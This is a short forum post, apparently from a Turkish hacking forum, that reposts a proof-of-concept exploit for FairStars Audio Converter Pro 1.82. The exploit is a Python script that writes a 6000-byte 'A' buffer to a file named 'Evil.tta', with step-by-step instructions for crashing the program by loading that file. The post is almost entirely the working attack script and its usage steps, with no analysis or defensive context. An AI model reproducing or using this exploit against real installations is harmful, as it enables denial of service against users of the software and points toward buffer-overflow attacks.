NasyoneL
- 25 Ağu 2017
- 25,022 Mesaj
Aktiflik
Seviye
Deneyim
Kod:
# Exploit Title: FairStars Audio Converter Pro 1.82 - '.tta' Denial of Service (PoC)
# Date: 25.5.2019
# Vendor Homepage:http://www.fairstars.com/
# Software Link: http://www.fairstars.com/download/facp_setup.exe
# Exploit Author: Achilles
# Tested Version: 1.82
# Tested on: Windows 7 x64 Sp1
# Windows XP Sp3
# 1.- Run the python script, it will create a new file with the name "Evil.tta"
# 2.- Open AudioConverterPro.exe and Click Add
# 3.- Load the file "Evil.tta"
# 4.- Click ok
# 5.- And you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
f=open("Evil.tta","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# 0day.today [2019-05-27] #
